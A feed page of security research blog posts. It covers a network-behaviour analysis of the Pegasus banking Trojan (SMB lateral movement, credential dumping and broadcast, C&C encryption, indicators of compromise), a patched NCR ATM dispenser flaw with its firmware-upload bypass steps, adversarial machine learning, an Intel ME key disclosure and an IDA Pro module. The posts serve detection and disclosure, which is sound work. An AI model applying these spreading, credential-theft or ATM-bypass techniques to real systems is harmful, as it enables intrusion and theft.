Quantcast
Channel: Positive Technologies - learn and secure
Viewing all 198 articles
Browse latest View live

Pegasus: analysis of network behavior

$
0
0
Source code for Pegasus, a banking Trojan, was recently published online. Although the Carbanak cybercrime gang was referenced in the archive name, researchers at Minerva Labs have shown that Pegasus actually is the handiwork of a different group known as Buhtrap (Ratopak). The archive contains an overview of the Trojan, its source code, description Russian banking procedures, and information on employees at a number of Russian banks.

The architecture of the Pegasus source code is rather interesting. Functionality is split among multiple modules, which are combined into a single binpack at compile time. During compilation, executables are signed with a certificate from the file tric.pfx, which is missing from the archive.

The network behavior of Pegasus is no less curious. After infection, Pegasus tries to spread within the domain and can act as a proxy to move data among systems, with the help of pipes and Mailslot transport. We focused on the unique aspects of the malware's network behavior and quickly added detection signatures to PT Network Attack Discovery. Thanks to this, all users of PT NAD can quickly detect this Trojan and its modifications on their own networks. In this article, I will describe how Pegasus spreads on a network and how copies of Pegasus communicate with each other.

Basic structure

Once on a victim computer, the initial module (InstallerExe) uses process hollowing to inject code into svchost.exe. After the main modules initialize, Pegasus launches several parallel processes:

  1. Domain Replication: Gathers information about the network and tries to spread Pegasus to other Windows systems.
  2. Mailslot Listener: Listens for Mailslot broadcasts, which are used by Pegasus to send stolen credentials. The slot name is generated at compile time.
  3. Pipe Server Listener: Listens to the Windows Pipe with a name derived from the name of the computer. These pipes are used mainly to discover and communicate with other copies of Pegasus on the same network.
  4. Logon Passwords: Tries once every few minutes to dump credentials from memory with the help of a Mimikatz-based module.
  5. Network Connectivity: Responsible for interfacing with the C&C server and periodically exchanging messages.
// start transports which links data with our CB-manager
pwInitPipeServerAsync(dcmGetServerCallback());
mwInitMailslotServer(dcmGetServerCallback());
...
// start broadcasting creds to other machines
cmStartupNetworkBroadcaster();

Domain Replication

This module is responsible for lateral movement on Windows networks. Movement consists of two steps:

  1. Discovering other machines on the domain.
  2. Trying to replicate Pegasus to those machines.


Discovery of other machines on the domain relies on use of two API calls: NetServerEnum, which requires the Browser service to work, and WNetOpenEnum/WNetEnumResource. All machines discovered on the domain are verified to determine whether they are already infected. Pegasus polls the generated pipe name more than 20 consecutive times once every 200 milliseconds. (We flagged this strange behavior as one of the indicators of Pegasus presence.) If Pegasus does not detect any signs of infection, it proceeds to the next step: replication.

With the help of credentials found on the host, Pegasus tries to log in to the target over the SMB protocol to IPC$ and ADMIN$ shares. If IPC$ is accessible but ADMIN$ is not, Pegasus concludes that the account does not have sufficient rights and marks the credentials as invalid. After obtaining access to the ADMIN$ share, which is an alias for the %windir% folder, the malware tries to determine the machine architecture in order to pick the suitable module to apply.

This process of architecture determination is based on the headers of PE files on the machine in question. Pegasus attempts to read the first 4 kilobytes of notepad.exe in the %windir% folder. One subtle drawback of this method is that on Windows Server 2012, notepad.exe is located at the path %windir%\System32.

Location of notepad.exe on Windows 7:

C:\Users\Administrator>where notepad.exe
C:\Windows\System32\notepad.exe
C:\Windows\notepad.exe

Location of notepad.exe on Windows Server 2012:

C:\Users\Administrator>where notepad.exe
C:\Windows\System32\notepad.exe

If notepad.exe is not found, Pegasus cannot infect the server, even if it has credentials for an account with the necessary rights. So the simple absence of Notepad in %windir% can stop Pegasus from spreading on Windows Server 2012. Using regedit.exe would have been a more surefire way of accomplishing this task.

After determining the architecture of the target server, Pegasus downloads a small (~10 kilobytes) Remote Service Exe (RSE) dropper. The dropper's purpose is to download binpack, which contains the payload modules, via a pipe in cleartext and hand off control to the Shellcode module. The name of the dropper is generated pseudorandomly and consists of 8 to 15 hexadecimal characters. The pseudorandom generator uses the name of the target machine as a seed and ensures that the name will be identical across restarts, in order to avoid littering %windir% with multiple copies.


After a check of the dropper’s integrity and making sure that the dropper has not been deleted by antivirus protection, an attempt is made to run the dropper via the Windows Management Instrumentation (WMI) mechanism. Service Control Manager (SCM) can also be used, but the malware prefers the first method because SCM leaves more traces in Windows logs. Code suggests plans by the creators of Pegasus to implement other replication methods: WSH Remote, PowerShell Remoting, and Task Scheduler. A module for running commands via RDP was under development as well.

As mentioned already, once launched the dropper successfully checks and starts listening to a pipe before handing off control to the payload that arrives.


Since Pegasus code is injected via process hollowing into the svchost.exe process, the victim disk will not retain any copy of the initial module InstallerExe (if infection started with the machine in question) or of the RSE dropper (in the case of replication). If the dropper is still accessible at a known path, Pegasus deletes it as follows:

  1. Overwrites the file contents with random data.
  2. Overwrites the file again, this time with empty data (zeroes).
  3. Renames the file.
  4. Deletes the file.

If infection is successful, Domain Replication begins again.

Mailslot

When Pegasus obtains credentials from another copy of Pegasus or from the mod_LogonPasswords module, the malware starts broadcasting the credentials on the domain. Broadcasting is performed using the Mailslot mechanism, which is based on SMB and allows sending one-way broadcasts of small portions of data to systems on the domain. The slot names are randomly generated. In order for all infected machines on the domain to send and receive data with the same slot name, the pseudorandom name generator is initialized from the variable TARGET_BUILDCHAIN_HASH, which is set in the configuration during build.

Since Mailslot imposes an upper limit on packet size, only one set of credentials is broadcast at a time. Among all available domain credentials, the set of credentials broadcast longest ago (=all other credentials have been broadcasted more recently at least once) is chosen.

Mailslot data is not sent in cleartext, but instead wrapped in three layers of XOR encryption, the keys for which are transmitted together with the data. The first layer is NetMessageEnvelope with an SHA1 integrity check, which is used for all data sent on the local network. The key is contained in 4 bytes in the beginning of the packet, and shifts 5 bits to the right per cycle. Inside is an XOR-encrypted data structure with fields for credentials and their date of addition. The beginning of the structure contains an 8-byte key, but no shifting is applied. After decoding the structure of the credentials, all that remains is to deserialize individual fields from ENC_BUFFER structures such as computer name, domain name, username, and password. These fields are encrypted with an 8-byte key with shifts. A sample Mailslot packet and script for decrypting it are available: script, PCAP.

In the release version of the malware, Mailslot messages are sent at an interval between 20 seconds and 11 minutes.

// some random wait before making next step
DbgPrint("going to sleep");
#ifdef _DEBUG
// debug - 2-5 s
Sleep(rg.rgGetRnd(&rg, 2000, 5000));
#else
// release - 20 - 650 s
//Sleep(rg.rgGetRnd(&rg, 2000, 65000) * 10);
Sleep(rg.rgGetRnd(&rg, 2000, 15000));
#endif

Besides providing credentials, Mailslot messages also announce Internet access and help to find other infected computers that have such access. NetMessageEnvelope indicates the type of message inside. Pipes make it possible for Internet-connected computers to communicate with computers that are not connected to the Internet.

Pipes

Pegasus uses pipes for two-way communication and sending large amounts of data. Although the name of each pipe is generated by a pseudorandom generator, it also depends on the machine name and build, which allows the Pegasus client and server to use the same name.

During one-way communication (such as when sending binpack during replication to another computer), data is sent unencrypted. At the beginning of binpack is the structure SHELLCODE_CONTEXT, which is 561 bytes long.


Two-way communication—say, when proxying data between a Pegasus copy with Internet access and a C&C server—makes use of the same NetMessageEnvelope structure with XOR encryption as we already saw with Mailslot. This is possible because the structure enables differentiating different message types based on the id field.

When data is being proxied, a query for data is sent (PMI_SEND_QUERY), the query ID is received, and the status of the query can be checked by its ID (PMI_CHECK_STATUS_QUERY). In most cases, the payload will be yet another Envelope structure, which adds features and another layer of encryption.

These pipes can do more than just help infected machines to communicate. The module mod_KBRI_hd injects cmd.exe processes with code that intercepts MoveFileExW calls and analyzes all copied data, since this is a part of the bank payment mechanism. If the copied file contains payment data of interest to the attackers, a notification is sent to the C&C server. The mod_KBRI module, injected into cmd.exe, communicates with Pegasus on an infected machine via a pipe whose name is not generated, but rather hard-coded:

\.\pipe\pg0F9EC0DB75F67E1DBEFB3AFA2

Module functionality also includes the ability to replace payment information on the fly using a template. Example search patterns are shown in the screenshot.


C&C traffic

Data exchange with the C&C server is handled by a separate stream that, every few minutes, checks the queue of data chunks from internal processes or other copies of Pegasus and sends them to the server

During initialization of the mod_NetworkConnectivity module, the presence of a network connection is tested in several steps:

1) Detection of proxy server settings and attempt to connect to www.google.com:

  • In the Registry branch \\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
  • Via WPAD (WinHttpGetProxyForUrl call)
  • Via the proxy server configuration for the current user (WinHttpGetIEProxyConfigForCurrentUser call)

2) Verification of connection with Microsoft update servers and data returned from the servers (authrootseq.txt,authrootstl.cab, rootsupd.exe)

3) Testing of HTTPS connections with one of the following addresses:

  • https://safebrowsing.google.com
  • https://aus3.mozilla.org
  • https://addons.mozilla.org
  • https://fhr.data.mozilla.com
  • https://versioncheck-bg.addons.mozilla.org
  • https://services.addons.mozilla.org

Only if all these checks are passed does Pegasus consider an external network to be accessible, after which it announces this fact on the domain via a Mailslot message. For stealth, Pegasus communicates with the C&C server only during working hours (9:00 a.m. to 7:00 p.m. local time).

Data chunks, wrapped in an envelope with checksum, are sent with DES encryption in CRYPT_MODE_CBC/PKCS5_PADDING mode. The encryption key is derived entirely from a variable that is set at compile time, meaning that we can decrypt traffic between Pegasus and the C&C server so long as we know the value of BUILDCHAIN_HASH. In the source code in the archive in question, this variable was equal to 0x7393c9a643eb4a76. A sample packet and script for decrypting the server check-in are available for download: GitHub, PCAP.

This content (in the INNER_ENVELOPE structure) is sent to the C&C server during check-in or together with other data. The beginning of it contains 28 bytes of envelope with a field for the length and SHA1 checksum.


When proxied via pipes between machines, the same data is sent, but wrapped in the NetMessageEnvelope we have already discussed, plus the checksum and XOR encryption.

The C&C operator can send execution commands to Pegasus copies. Messages with commands or other data, such as EID_CREDENTIALS_LIST, can contain their own layers of encryption for fields, as we already saw with broadcasting of stolen credentials.

Detection

Our attention focused on how to detect Pegasus activity on networks. After carefully studying source code and running the malware in a test environment, we were able to create a list of network anomalies and artifacts that clearly indicate the presence of this sophisticated threat.

It would be fair to call Pegasus versatile: it actively uses the SMB protocol to send messages and communicate with other copies. The methods used for replication and C&C interaction are also distinct. Pegasus copies establish a peer-to-peer network on the domain, building a path to the Internet and communicating with C&C servers by means of traffic proxying. Certificate signing of executables and use of Microsoft and Mozilla sites for verifying connection access complicate attempts to detect Pegasus activity and discover infected hosts.

The Pegasus source code is relatively well structured and commented, making it likely that other threat actors will copy or "borrow" code for their own malware.

Many of the mechanisms for remotely running commands and searching for credentials remain unimplemented. Among the developers' unrealized plans was the ability to modify shellcode on the fly during process injection.

We have developed several signatures for PT NAD and the Suricata IDS suitable for detecting Pegasus-specific activity at various stages, within the very first seconds of presence. Public signatures for Suricata are available from our company on GitHub and Twitter, and will automatically be added to Suricata if you use the suricata-update mechanism.

You can view detections with Pegasus signatures in the following screenshot. This view is taken from PT Network Attack Discovery, our product for incident detection and forensic investigation:


In addition, here are some useful indicators of compromise (IoC):

MAILSLOT\46CA075C165CBB2786 
pipe\pg0F9EC0DB75F67E1DBEFB3AFA2

hxxp://denwer/pegasus/index.php
hxxp://mp3.ucrazy.org/music/index.php
hxxp://support.zakon-auto.net/tuning/index.asp
hxxp://video.tnt-online.info/tnt-comedy-tv/stream.php

Author: Kirill Shipulin, @attackdetection team, Twitter | Telegram


Low-level Hacking NCR ATM

$
0
0


Many of the systems that power the modern world are supposed to be beyond the reach of mere mortals. Developers naively assume that these systems will never give up their secrets to attackers and eagle-eyed researchers.

ATMs are a perfect case in point. Thefts with malware of the likes of Cutlet Maker, as well as unpublicized incidents when unknown attackers plugged in their laptop to an ATM and stole cash without leaving any system logs behind, confirm what the security community has long known. There is no such thing as a hack-proof system, merely one that has not been sufficiently tested.

Getting started

Even now, many people think that the only way to rob an ATM involves the brutest of brute force: pulling up in a pickup, attaching a hook, and pushing hard on the gas pedal, before savaging the ATM with a circular saw, crowbar, and welding kit.

But there is another way.

After a brief search on eBay, I obtained the board for a NCR USB S1 Dispenser with firmware. I had two objectives:

  • Bypass the encryption used for commands (such as "dispense banknotes") that are sent by the ATM computer via USB to the dispenser.
  • Bypass the requirement for physical access to the safe in order to complete authentication (which must be performed by toggling the bottom cassette in the safe), which is needed for generating the encryption keys for the commands mentioned above.


Firmware

The firmware is an ELF file for the NXP ColdFire processor (the Motorola 68040, my favorite CPU!) running on VxWorks v5.5.1.


There are two main sections of interest in the ELF file, .text and .data:

  • The first contains code that loops continuously most of the time (we'll call it the "main firmware") when the dispenser is connected to the system in the upper part of the ATM.
  • The second contains a zlib-compressed bootloader (locally named "USB Secure Bootloader"), which is responsible for uploading firmware and running the main code.

And best of all (for researchers, anyway), is that the debug symbols in the ELF file were all there and easily searchable.

Inner workings of the main firmware

We can divide the code into four main levels, from top to bottom in the hierarchy:

  1. USB Receive Thread, which accepts USB packets and distributes them to the different services.
  2. Services are the main units of execution. Each service has a particular role and corresponding tasks (classes).
  3. Classes, here, are tasks that can be performed by a particular service using controllers.
  4. Controllers are the workers that validate tasks, perform tasks, and generate result packets.


There was a lot of firmware code, so I decided to start by finding all possible services and only then trying to figure out where tasks are transferred.

Here are the services I found that were responsible for the actions of interest:

1) DispTranService (Dispenser Transaction Service): Handles encrypted commands, generates bundle of banknotes, authenticates, and much more. Sure, the interesting stuff.


2) securityService: After authentication, a session key is generated on the dispenser. When requested by the ATM computer, the session key is sent to it in encrypted form. This key is then used to encrypt all commands designated important by the vendor, such as dispensing cash and banknotes bundle forming.


But then another service, UsbDownloadService, caught my eye. The job of this service is, when the dispenser is connected to the computer and the firmware version on the dispenser doesn't match the version on the computer, switch to the bootloader in order to upload the firmware needed to work (which is stored in the folder with the vendor's software on the computer) with the OS. This service can also give us information about the current firmware version.


Physical authentication

Physical authentication is in fact implemented extremely well, with the mission of protecting the ATM from unauthorized USB commands. The ATM safe with cash must be open in order to perform either of the following actions:

  • Remove and insert the lower cassette.
  • Toggle the switch on the dispenser main board.


But this all is required only if the access level is set to the maximum. There are a total of three access levels: USB (0), logical (1), and physical (2). The first two are used by firmware developers for debugging and testing. The vendor, of course, strongly urges selecting the third one by default.

The vulnerability

Here I will describe a critical vulnerability (now fixed by the vendor) that with physical access to the service zone of the ATM but not to the safe zone (such as through a hole drilled in the ATM front panel), allowed the dispenser execute any command – even if the command is "give me cash now!"


I found that UsbDownloadService accepts commands that don't require encryption. That sounds tempting, but shouldn't Secure Bootloader prevent any further mischief, as its name implies?

Spoiler: …it doesn't!

We need to go deeper 

As mentioned already, the .data section contains compressed bootloader code that didn't initially catch my attention or that of my colleagues.


As long as the bootloader remained a secret, there was no way to answer the question: "How does the software on the computer upload the dispenser’s firmware?" The main firmware did not reveal any clues.


So the bootloader is unpacked and loaded into the IDA at offset 0x100000, from where investigation can start… except there are no debug symbols there!

But after comparing the main firmware with the bootloader code and reading the controller datasheet, I started to get a better idea of what was happening.


Although the process of firmware uploading seemed to be secure, in reality it was not. The trick was just to upload the firmware in the right way :)

Fully understanding this process took a lot of time and dedication (details can be learned from "Blackbox is dead – Long live Blackbox!" at Black Hat USA 2018 in Las Vegas). These efforts included re-soldering NVRAM and copying the backup to it in order to unbrick the controller… and other easy-peasy stuff like that.

Thank you to my colleague Alexey for his patience!

Here is the method for uploading firmware to the dispenser:

1) Generate an RSA key pair and upload the public key to the controller.


2) Write .data and .text from the ELF in sequence to their physical addresses, taken from the section headers:


3) Calculate the SHA-1 checksum for the newly written data, encrypt that value with the private key, and send the result to the controller.


4) Calculate and send the sum of all firmware words that have been written.


At which point, if everything has been calculated and written correctly, the main firmware will boot without a hitch.

Only one restriction was found for the firmware writing process: the version of the "new" firmware cannot be less than the version of the current firmware. But there's nothing to stop you from tinkering with the firmware number in the data that you write yourself.

So my special firmware with anti-security "secret sauce" was uploaded and run successfully!

By now I had a good knowledge of the main firmware, commands used to dispense cash, and more. All that remained was to send (unencrypted) commands, which the dispenser would eagerly obey.


Cash dispensing

This successful result was a worthy intellectual (although not monetary) reward for all the travails of research, such as bricking a real ATM (oops!). My curiosity almost inspired me to try repeating this trick with another major ATM vendor.


Ultimately, a very real ATM began to whirr and spit out very not-real dummy bills (vendors' shiny equivalent of Hollywood prop money). No magic was necessary: just a laptop, brainpower, and a USB cord.

Conclusions

"Security through obscurity" is no security at all. Merely keeping code or firmware proprietary will not stop an attacker from finding a way in and taking advantage of vulnerabilities. Curiosity and an initial financial outlay are all that is required.

Just as development is best handled by developers, security should be the job of security professionals. The most productive approach for vendors is to work closely with dedicated security companies, which have teams possessing the necessary experience and qualifications to assess flaws and ensure a proper level of protection on a case-by-case basis.

Postscriptum

The vendor has confirmed the vulnerability (which was also found in the S2 model) and declared it fixed as of the February 2018 patch.

CVE listings:

  • CVE-2017-17668 (NCR S1 Dispenser)
  • CVE-2018-5717 (NCR S2 Dispenser)

Acknowledgements

Before I had even set to work on the firmware, Dmitry Sklyarov and Mikhail Tsvetkov had already discovered a lot about it (even without having a dispenser board). Their findings were of enormous assistance! And as concerns everything hardware-related, Alexey Stennikov's help was absolutely invaluable.

Author: Vladimir Kononovich, Positive Technologies

Machine learning: good for security or a new threat?

$
0
0
Machine learning is no novelty anymore. On the contrary: every self-respecting startup feels compelled to apply machine learning in its offerings. The hunt for scarce developers has been superseded by a scramble for machine learning experts. Fortunately, many machine learning tasks are similar enough that it is possible to save time and money by using pre-trained models. Open-source models are also available free of charge. But does this all really work as well as it seems?

Machine learning methods mean methods of creating algorithms that can learn and act without being explicitly programmed using prearranged data. Data refers to anything that can be either described using any features or measured. If we need a feature that is unknown for part of the data, we apply machine learning methods to predict the values of this feature based on already known data.

The figure below illustrates how any object is described by some features X, which can be measured, calculated, or discovered. There is also a target feature y, which can be unknown for some of the data. Using the data for which the target feature is known, we can train a model to predict the target feature for the remainder of the data.


Machine learning is used for solving several types of tasks, but this article will mostly consider the topic of classification.

The aim of the classifier model training stage is to find a correlation (function) that maps features of a specific object to one of the known classes. Cases that are more complicated require prediction of the class probability.

In essence, we have a set of input values 
--> X = {x1, … , xn}, a set of potential classes  --> Y = {y1, … , ym}    , and a loss function l. Our task is to find a function f: X → Y based on available data D, so that f minimizes loss function l. A quadratic loss function is the type most commonly used.
Function space F can be any mapping of functions that relate X → Y.


Thus, the task of classification is to create a hyperplane that would divide the space, the size of which generally equals the size of feature vector, in parts so that the objects of each class lie on different sides of this hyperplane.

The hyperplane for two-dimensional space is a line. Let us review a simple example:

The figure shows two classes: squares and triangles. It is impossible to identify the relation and accurately divide them with a linear function. Machine learning can approximate the non-linear function that would divide these two sets in the best way.

Classification is a task for supervised learning. Learning requires a set of data with distinguishable object features and classes.

Developers of such systems often face a critical question: who should tag these object classes? In some cases, historical data is available or object features can be measured, and sometimes there is an expert who can provide this information. But is this information always correct and objective?

Information security has been applying machine learning methods for quite some time now, in areas such as spam filtering, traffic analysis, and fraud and malware detection. It is a bit of a cat-and-mouse game in which one makes their move and waits for the opponent's response. And while playing this "game," you have to continuously train models using new data or replace them completely because of the latest breakthroughs.

An illustration of this case is antivirus software, which makes use of signature analysis, heuristics, and manually created rules. Maintaining all this is rather time-consuming! Information security experts debate the usefulness of antivirus solutions; many consider it a dead product category. All these rules applied in antivirus products can be bypassed, for example with obfuscation and polymorphism. Therefore, we would likely prefer tools that use smarter techniques such as machine learning for automatic identification of features (even those uninterpretable by a human), quick processing and generalizing of large quantities of data, and fast decision-making.

So as we see, on the one hand, machine learning can be used for protection. On the other hand, it also makes attacks smarter and more dangerous.

Let's check if this tool is vulnerable


Any algorithm requires not only carefully selected hyperparameters, but also training data. Ideally, training data should be sufficient, with balanced classes and a brief training period—which is nearly impossible in real life.

By the quality of a trained model, we usually refer to accuracy in classifying data that the model "sees" for the first time. Broadly speaking, quality represents the ratio of correctly classified data samples to the total amount of data provided to the model.

All quality assessments make implicit assumptions about the expected distribution of input data and do not take into account adversarial settings, which frequently go beyond the expected distribution of input data. Adversarial settings mean an environment in which it is possible to confront or interact with the system. Typical examples of such settings include environments that use spam filters, fraud detection algorithms, and malware analysis systems.

Thus accuracy can be seen as an average value of system performance in typical cases, while security assessment considers the worst performance cases.

Machine learning models are commonly tested in a more or less static environment, in which accuracy depends on the quantity of data for each specific class, but we cannot be sure that such a distribution will exist in reality. However, we want the model to make mistakes. Therefore, our task is to find as many vectors giving a misleading result as possible.

When we speak of the security of a system or service, we generally mean that it is impossible to breach a hardware or software security policy within the framework of our threat model, as verified during the development and test stages.

Unfortunately, a large number of services currently use data analysis algorithms, therefore, a risk can come not from vulnerable functionality, but from the data used by a system to make decisions.

Change is all around us, and hackers too are constantly learning something new. To protect machine learning algorithms from attackers, who may abuse their knowledge of how a model operates to compromise the system, adversarial machine learning methods are used.

This concept of information security in machine learning gives rise to a number of questions, some of which we will discuss here.

Is it possible to manipulate a machine learning model to perform a targeted attack?


Here is a simple example with search engine optimization (SEO). People already study the way the smart algorithms of search engines work and manipulate websites to get a higher ranking in search results. Security of such systems is not a critical issue, as long as no data is compromised or significant damage is caused.

It is possible to attack services that are based on online learning: to train the model, data is provided in consecutive order to update current parameters. With knowledge of the system's learning process, an attacker can change the result by supplying suitably arranged data to the system.

Biometric systems, for example, can be fooled in this way. Their parameters are gradually updated based on slight changes in appearance, such as aging, which is absolutely natural and essential to take into account. But an impostor can benefit by feeding certain data to the biometric system that subtly influences the learning process until, eventually, the model learns to accept the impostor's appearance.

Can an impostor select valid data so that the data would always trigger a malfunction, degrading system performance to the point that the system must be disabled?


This issue is quite natural because machine learning models are tested in a static environment, and their quality is assessed based on the distribution of the data that has been used for learning. Nevertheless, data analysis experts face the following questions, which their models have to be able to answer:

  • Is the file malicious?
  • Is the transaction fraudulent?
  • Is the traffic legitimate?

Of course, an algorithm cannot be 100 percent accurate; it can only classify an object with some probability. Therefore, in case of type I and type II errors—when our algorithm cannot be completely sure of its choice and makes mistakes—a compromise has to be found.

Let's review a sample system with very frequent type I and type II errors. An antivirus product has blocked your file, falsely considering it to be malicious, or has failed to protect you from a malicious file. In this case, a user considers the product to be useless and simply disables it, although the error may be due to the dataset.

And the thing is that there always exists a dataset that will yield the worst results for a given model. So all an attacker needs to do is find such data in order to make the user disable the service. Such situations are rather troublesome and should be avoided by the model. Imagine the work involved in investigating all false incidents!

Type I errors are considered a waste of time, while type II errors are a missed opportunity. But in fact, the cost of these two types of errors may be different for each system. For antivirus software, type I errors may be less costly: it is better to be overcautious and err on the side of calling a file malicious. After all, if the user has disabled the software and the file actually was malicious, the antivirus product still "did its job" and the responsibility lies with the user. If we are talking about a system for medical diagnostics, both mistakes are rather expensive: in either case, the patient is at risk of incorrect treatment and risk to health.

Can an attacker who wants to disrupt a system take advantage of the properties of a machine learning method, without interfering with the training process? In other words, could an attacker identify limitations in the model that invariably produce false predictions?


The process of assigning features in deep learning systems seems to be basically safe from human interference, so in this sense decision-making by the model is safe from the human factor. The great thing about deep learning is that you only need to feed raw input data to the model; by multiple linear transformations, the model itself extracts the features it considers the most important and makes a decision. But what are the limitations of this approach?

Research papers have described adversarial examples, which are improperly classified by the system, in deep learning. One of the most well-known articles is "Robust Physical-World Attacks on Deep Learning Models."

Based on the restrictions of deep learning, the authors suggested a number of techniques for bypassing models that can deceive vision systems. As an example, they performed experiments with traffic sign recognition. To fool the system, it would be sufficient to identify the object areas that, when modified, confuse the classifier into making a mistake. The experiment was to modify a STOP sign so that it would be classified as SPEED LIMIT 45 by the model. The researchers also tested their approach on other traffic signs, with similarly successful results.



In general, the article explains two ways of fooling a machine learning system: poster-printing attacks, which involve a number of small perturbations (camouflage) on the sign, and sticker attacks, with placement of stickers in specific areas.

These situations can easily occur in real life: a traffic sign is covered with dust or has undergone an artistic intervention. So it might seem that artificial intelligence and art are fated to exist apart.


Targeted attacks against automatic speech recognition systems have also lately become fodder for research. Voice messages are "cool" on social networks, but not always convenient to listen to. Hence the creation of speech-to-text services. The researchers analyzed original audio and its waveform and created a different audio waveform, which was 99 percent similar to the original one with minor changes added. The resulting transcription yields the text selected by the attacker.
The figure below gives an attack illustration: a waveform is slightly modified, causing the transcription to consist of a phrase chosen by the attacker.


What methods are there to prevent manipulation of machine learning models?


Currently it is easier to attack a machine learning model than to protect it from adversarial attacks. The reason is that no matter how long we train the model, there always exists a dataset that will be misclassified by the model.

Nobody has yet invented any ways to guarantee perfect accuracy by a model. However, there are several ways to make a model more robust to adversarial examples.

Our main tip is: do not use machine learning models in adversarial settings if possible. You're in the clear to use machine learning if your task is to classify pictures or generate memes. Even if a deliberate attack is successful, the societal or economic consequences are minimal. However, if your system performs important functions—say, diagnosing diseases, detecting attacks against industrial facilities, or controlling a self-driving car—the risks of compromise may be disastrous.

Recalling our simplified description of what classification is—creating a hyperplane that would divide space into classes—we can observe a contradiction. Let's review this situation in two-dimensional space.

On the one hand, we are trying to find the function that would divide two classes into different groups with maximum accuracy. On the other hand, we cannot form an accurate line because we generally do not have the entire population. Our task is to find the function that would minimize classification mistakes. To summarize, we want to form an accurate line, while avoid overfitting (hewing too closely to the known data) so that the model can still predict the behavior of unknown data.


1—underfitting; 2—overfitting; 3—optimal

The way to avoid underfitting is clear: by increasing the dataset for training by any means possible. Overfitting also can be combated with effective regularization methods. These methods make a model more robust to small outliers, but not to adversarial examples.

Incorrect classification of adversarial examples is an obvious problem. If a model has not seen such examples among its training data, it will probably make errors. This issue can be solved by adding adversarial examples to the training dataset, at least to avoid those particular errors. Still, it seems improbable that we can generate all possible adversarial examples and have 100 percent accuracy, because of needing to find a compromise between overfitting and underfitting.

One more tool is a generative adversarial network (GAN), which consists of two neural networks—generative and discriminative. The discriminative model aims to distinguish between fake and real data, and the generative model learns to generate data that can fool the discriminative model. A compromise between sufficient classification quality of the discriminator and the time spent on learning can produce a model that is robust to adversarial examples.

But despite these methods, it is still possible to create a dataset that will lead the model to a wrong solution.

What are the potential implications of machine learning for information security?


Debates about who should bear responsibility for errors made by machine learning models, as well as their social consequences, have gone on for a long time. Creation and use of such systems involves several stakeholders, including algorithm developers, data providers, and system users (that is to say, the owners).

At first glance, the developer would seem to have a great impact on the result—from selecting an algorithm to setting parameters and performing testing. But in reality, the developer makes a software product that is supposed to meet certain requirements. As soon as the model complies with these requirements, the developer's work is done and the model moves into the operational stage, probably revealing some bugs in the process.

On the one hand, this happens because developers cannot know the whole population of data at the training stage. But on the other hand, this can be an artifact of real-life data. A very vivid example is the Twitter chatbot created by Microsoft that learned from real data and then started to write racist tweets.

Was such behavior a bug or a feature? The algorithm used real data for learning and started to imitate it. That might seem to be a marvelous achievement by the developers, in a technical sense. But the data was what it was, so from an ethical point of view, this bot turned out to be unusable—because it learned so well to do what everyone wanted it to do.

Perhaps Elon Musk was right after all to claim that "artificial intelligence is our biggest existential threat"?

Positive Technologies researcher finds vulnerability enabling disclosure of Intel ME encryption keys

$
0
0
Image credit: Unsplash
Intel has issued a patch in response to a serious vulnerability in Intel ME firmware discovered by Positive Technologies expert Dmitry Sklyarov. The vulnerability involved security mechanisms in the MFS file system, which Intel ME uses to store data. By exploiting this flaw, attackers could manipulate the state of MFS and extract important secrets.

Intel ME (short for "Management Engine") stores data with the help of MFS (which likely stands for "ME File System"). MFS security mechanisms make heavy use of cryptographic keys. Keys differ in purpose (confidentiality vs. integrity) and degree of data sensitivity (Intel vs. non-Intel). The most sensitive data is protected by Intel Keys, with Non-Intel Keys used for everything else. So in total, four keys are used: Intel Integrity Key, Non-Intel Integrity Key, Intel Confidentiality Key, and Non-Intel Confidentiality Key.

In 2017, Positive Technologies experts Mark Ermolov and Maxim Goryachy uncovered a vulnerability that could be exploited to obtain all four keys, thus completely compromising MFS security mechanisms.

Intel later issued an update addressing this vulnerability. By increasing the Security Version Number (SVN), Intel updated all keys to make MFS security work as intended. It should now have been impossible to obtain the MFS keys for updated ME firmware versions (those with the new SVN value).

But in 2018, Positive Technologies expert Dmitry Sklyarov discovered vulnerability CVE-2018-3655, described in advisory Intel-SA-00125. He found that Non-Intel Keys are derived from two values: the SVN and the immutable non-Intel root secret, which is unique to each platform. By using an earlier vulnerability to enable the JTAG debugger, it was possible to obtain the latter value. Knowing the immutable root secret enables calculating the values of both Non-Intel Keys even in the newer firmware version.

Attackers could calculate the Non-Intel Integrity Key and Non-Intel Confidentiality Key for firmware that has the updated SVN value, and therefore compromise the MFS security mechanisms that rely on these keys.

The Non-Intel Integrity Key enforces the integrity of all MFS directories. Knowledge of this key could be abused to add files, delete files, and change their protection attributes. This key also underlies anti-replay tables, which are intended to prevent substitution of the contents of some files with previous versions. Anti-replay mechanisms could be easily bypassed as a result. The Non-Intel Confidentiality Key secures certain files and is used to encrypt the AMT password, for example.

By sequentially exploiting the vulnerabilities discovered by Positive Technologies in 2017 and 2018, an attacker could take advantage of ME to obtain vital secrets. Although the need for physical access makes exploitation more difficult, the scope of the threat remains breathtaking.

Positive Technologies experts have found a number of vulnerabilities in Intel ME. Mark Ermolov and Maxim Goryachy gave a talk at Black Hat Europe regarding a vulnerability they discovered. At the same conference, Dmitry Sklyarov delved into the workings of the ME file system.

In addition, Positive Technologies experts devised a method for disabling Intel ME by using an undocumented mode and showed how to enable JTAG debugging.

How we developed the NIOS II processor module for IDA Pro

$
0
0
IDA Pro UI

IDA Pro has a well-earned place in the toolkit of security researchers worldwide. We at Positive Technologies are no exception. In fact, we like it so much that we developed a disassembler processor module for the NIOS II architecture to make analyzing code faster and more convenient.

Here I will give a brief history of the project and share what exactly it is that we created.

Beginnings


It all started in 2016, when we had to develop a processor module in-house to analyze firmware for some work we were doing. Development started from scratch based on the Nios II Classic Processor Reference Guide, which was the most up-to-date reference at the time. This took about two weeks.

The processor module was developed for IDA version 6.9. IDA Python was the logical choice for the sake of speed. The procs subfolder inside the IDA Pro installation folder, where processor modules are stored, contains three Python modules: msp430, ebc, and spu. These modules offered an example as to module structure and how to implement basic functionality:

  • Parsing instructions and operands
  • Simplifying and displaying same
  • Creating offsets, cross-references, and the code and data to which they refer
  • Handling switch constructions
  • Handling manipulations with the stack and stack variables

This is the functionality I was able to implement at that time, more or less. Fortunately, these labors came in handy again during a different project a year later, during which I actively used and improved the module.

I decided to share this experience creating a processor module with the community at PHDays 8. The talk drew interest (a video is available on the PHDays site) and even Ilfak Guilfanov, the creator of IDA Pro, was in attendance. One of his questions was: is IDA Pro version 7 supported? The answer then was "no" but after the talk, I committed to releasing a module version that would. And that's when things got interesting.

